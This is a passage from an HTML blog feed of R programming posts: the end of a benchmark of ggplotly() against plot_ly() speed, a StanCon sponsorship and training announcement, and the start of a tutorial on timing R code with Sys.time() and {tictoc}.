&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;mean, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;year,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;year, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;scatter&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; times &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;, unit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;s&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;time
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Unit: seconds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## expr min lq mean median uq max neval cld&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ggplotly 0.050139 0.052229 0.070750 0.054760 0.056785 1.56652 100 b&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## plotly 0.002475 0.002527 0.003017 0.002571 0.002674 0.03061 100 a&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;autoplot&lt;/span&gt;(time)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="comparison1.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;Now I thought nesting a {ggplot2} object within &lt;code&gt;ggplotly()&lt;/code&gt; would be slower than using &lt;code&gt;plot_ly()&lt;/code&gt;, but I didn’t think it would be this slow. On average &lt;code&gt;ggplotly()&lt;/code&gt; is approximately 23 times slower than &lt;code&gt;plot_ly()&lt;/code&gt;. &lt;strong&gt;&lt;em&gt;23!&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
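&lt;p&gt;That figure is just the ratio of the two mean timings in the benchmark output. Here is a minimal sketch of the arithmetic, with the reported means typed in by hand. The data frame &lt;code&gt;timings&lt;/code&gt; and the variable &lt;code&gt;slowdown&lt;/code&gt; are names made up for this illustration, not objects created earlier in the post.&lt;/p&gt;

```r
# Mean run times in seconds, copied by hand from the benchmark output
timings = data.frame(
  expr = c("ggplotly", "plotly"),
  mean = c(0.070750, 0.003017)
)

# How many times slower is ggplotly() than plot_ly() on average?
slowdown = timings$mean[timings$expr == "ggplotly"] /
  timings$mean[timings$expr == "plotly"]

# Rounds to 23
round(slowdown)
```

&lt;p&gt;With the real benchmark object, &lt;code&gt;summary(time)$mean&lt;/code&gt; should give you the same two numbers without any retyping.&lt;/p&gt;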
&lt;p&gt;Let’s take it up a notch. There we were plotting only 20 points. What if we plot over 20,000? Here we will plot the min, mean and max births on each day.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Birthdays &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(births), min &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;min&lt;/span&gt;(births), max &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;(births)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gather&lt;/span&gt;(birth_stat, value, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;date)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Wrapping this as a {ggplot2} object inside &lt;code&gt;ggplotly()&lt;/code&gt; we obtain this graph…&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplotly&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; date, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; birth_stat)))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="ggplotly2.png" style="width:450px; class:image-center"&gt;
&lt;p&gt;Whilst using &lt;code&gt;plot_ly()&lt;/code&gt; we obtain…&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_ly&lt;/span&gt;(date,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;date, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;value, color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;birth_stat,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;scatter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plotly2.png" style="width:450px; class:image-center"&gt;
&lt;p&gt;Again, both plots are identical, bar styling.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;time2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;microbenchmark&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplotly &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplotly&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; date, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; birth_stat))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plotly &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_ly&lt;/span&gt;(date, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;date, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;value,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;birth_stat,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;scatter&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; times &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;, unit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;s&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;time2
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Unit: seconds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## expr min lq mean median uq max neval cld&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ggplotly 0.335823 0.355301 0.389759 0.365353 0.378502 0.54746 100 b&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## plotly 0.002472 0.002534 0.002719 0.002585 0.002675 0.01179 100 a&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;autoplot&lt;/span&gt;(time2)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="comparison2.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;On average &lt;code&gt;ggplotly()&lt;/code&gt; is 143 times slower than &lt;code&gt;plot_ly()&lt;/code&gt;, with the max run time being 0.547 seconds!&lt;/p&gt;
&lt;h3 id="summary"&gt;Summary&lt;/h3&gt;
&lt;p&gt;I’m going to level with you. Using &lt;code&gt;ggplotly()&lt;/code&gt; in interactive mode isn’t a problem. Well, it’s not a problem until your shiny dashboard or your markdown document has to generate a few plots at the same time. With only one plot, you’ll probably go with the method that gives you your style in the easiest way possible and you’ll do this with no repercussions. However, let’s say you’re making a shiny dashboard and it now has over 5 interactive graphs within it. Suddenly, if you’re using &lt;code&gt;ggplotly()&lt;/code&gt;, the lag we noticed in the analysis above starts to build up unnecessarily. That’s why I’d use &lt;code&gt;plot_ly()&lt;/code&gt;.&lt;/p&gt;
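&lt;p&gt;To put a rough number on that build-up, the sketch below multiplies the mean timings from the 20,000-point benchmark by the number of plots. It assumes the plots are generated one after another and that each costs about the same as the benchmarked plot. Both are simplifications, and &lt;code&gt;n_plots&lt;/code&gt; is a hypothetical dashboard size.&lt;/p&gt;

```r
# Mean time per plot in seconds, copied from the 20,000-point benchmark
mean_ggplotly = 0.389759
mean_plotly = 0.002719

# Hypothetical dashboard with five interactive plots, built one after another
n_plots = 5

total_ggplotly = n_plots * mean_ggplotly
total_plotly = n_plots * mean_plotly

# Roughly 1.95 seconds versus 0.014 seconds
round(c(ggplotly = total_ggplotly, plotly = total_plotly), 3)
```

&lt;p&gt;Nearly two seconds of waiting on every refresh is something your users will notice. A hundredth of a second is not.&lt;/p&gt;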
&lt;p&gt;Thanks for chatting!&lt;/p&gt;
&lt;hr&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;R.version.string
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;R version 3.4.2 (2017-09-28)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;packageVersion&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#39;2.2.1&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;packageVersion&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;plotly&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#39;4.7.1&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/comparing-plotly-ggplotly-plot-generation-times/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Official StanCon Sponsor</title><link>https://www.jumpingrivers.com/blog/official-stancon-sponsor/</link><pubDate>Mon, 20 Nov 2017 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/official-stancon-sponsor/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/official-stancon-sponsor/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/official-stancon-sponsor/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Stan is freedom-respecting, open-source software for facilitating statistical inference at the frontiers of applied statistics.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Or to put it another way, it makes Bayesian inference fast and (a bit) easier.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://mc-stan.org/events/stancon2018/" rel="external"&gt;StanCon&lt;/a&gt; is the premier conference for all things &lt;a href="http://mc-stan.org/" rel="external"&gt;Stan&lt;/a&gt; related and this year it will take place at the &lt;a href="http://www.visitasilomar.com/" rel="external"&gt;Asilomar Conference Grounds&lt;/a&gt;, a National Historic Landmark on the Monterey Peninsula right on the beach.&lt;/p&gt;
&lt;h4 id="rstan-and-other-interfaces"&gt;RStan and other interfaces&lt;/h4&gt;
&lt;p&gt;One of the great features of Stan is that you can use it via R (or Python or …). The &lt;a href="https://github.com/stan-dev/rstan/wiki/RStan-Getting-Started" rel="external"&gt;{rstan}&lt;/a&gt; package can be installed in the usual way&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rstan&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and has been around for a few years, so is fairly stable. The easiest way to get started is to check out the rstan &lt;a href="https://github.com/stan-dev/rstan/wiki/RStan-Getting-Started" rel="external"&gt;wiki&lt;/a&gt; page, which gives a couple of worked through examples.&lt;/p&gt;
&lt;h4 id="training"&gt;Training&lt;/h4&gt;
&lt;p&gt;If you are interested in learning more about Stan, we run a two-day &lt;a href="https://www.jumpingrivers.com/training/course/bayesian-inference-stan-rstan-pystan/"&gt;introduction to Stan&lt;/a&gt; course. The course covers:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Introduction to Bayesian inference: A brief overview of the main ideas behind Bayesian inference.&lt;/li&gt;
&lt;li&gt;Markov chain Monte Carlo methods: A brief overview of Markov chain Monte Carlo methods for Bayesian computation and Hamiltonian Monte Carlo.&lt;/li&gt;
&lt;li&gt;The Stan language: An outline of the main components of a Stan program.&lt;/li&gt;
&lt;li&gt;Using RStan: A guide to the use of the R interface to Stan.&lt;/li&gt;
&lt;li&gt;Examples: Including linear regression, Poisson regression and hierarchical models.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Space is limited.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/official-stancon-sponsor/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Timing in R</title><link>https://www.jumpingrivers.com/blog/timing-in-r/</link><pubDate>Mon, 20 Nov 2017 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/timing-in-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/timing-in-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/timing-in-r/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;As time goes on, your R scripts are probably getting longer and more complicated, &lt;em&gt;right&lt;/em&gt;? Timing parts of your script could save you precious time when re-running code over and over again. Today I’m going to go through the 4 main functions for doing so.&lt;/p&gt;
&lt;h2 id="nested-timings"&gt;Nested timings&lt;/h2&gt;
&lt;h3 id="1-systime"&gt;1) &lt;code&gt;Sys.time()&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;Sys.time()&lt;/code&gt; takes a “snapshot” of the current time, so it can be used to record the start and end times of a piece of code.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;start_time &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.time&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;end_time &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.time&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To calculate the difference, we just use a simple subtraction&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;end_time &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; start_time
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Time difference of 0.5027 secs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Notice it creates a neat little message for the time difference.&lt;/p&gt;
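&lt;p&gt;One thing to watch: the subtraction returns a &lt;code&gt;difftime&lt;/code&gt; object whose units are chosen automatically, so a longer-running chunk may be reported in minutes or hours rather than seconds. If you want to store timings as plain numbers, a minimal sketch is to fix the units explicitly (the variable name &lt;code&gt;elapsed_secs&lt;/code&gt; is made up for this example):&lt;/p&gt;

```r
start_time = Sys.time()
Sys.sleep(0.5)
end_time = Sys.time()

# Ask for seconds explicitly, then drop the difftime class
elapsed_secs = as.numeric(difftime(end_time, start_time, units = "secs"))
elapsed_secs
```

&lt;p&gt;The result is an ordinary number of seconds, which is easier to log or compare across runs than the printed message.&lt;/p&gt;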
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2017-timing-in-r"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="2-the-tictoc-package"&gt;2) The {tictoc} package&lt;/h3&gt;
&lt;p&gt;You can install the &lt;code&gt;CRAN&lt;/code&gt; version of {tictoc} via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tictoc&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;whilst the most recent development version is available via &lt;a href="https://github.com/collectivemedia/tictoc" rel="external"&gt;the {tictoc} GitHub page&lt;/a&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tictoc&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Like &lt;code&gt;Sys.time()&lt;/code&gt;, {tictoc} also gives us the ability to nest timings within code. However, we now have some more options to customise our timing. At its most basic it acts like &lt;code&gt;Sys.time()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tic&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;toc&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 0.505 sec elapsed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now for a more contrived example.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# start timer for the entire section, notice we can name sections of code&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tic&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;total time&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# start timer for first subsection&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tic&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Start time til half way&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# end timer for the first subsection, log = TRUE tells toc to give us a message&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;toc&lt;/span&gt;(log &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Start time til half way: 2.013 sec elapsed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now to start the timer for the second subsection&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tic&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Half way til end&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
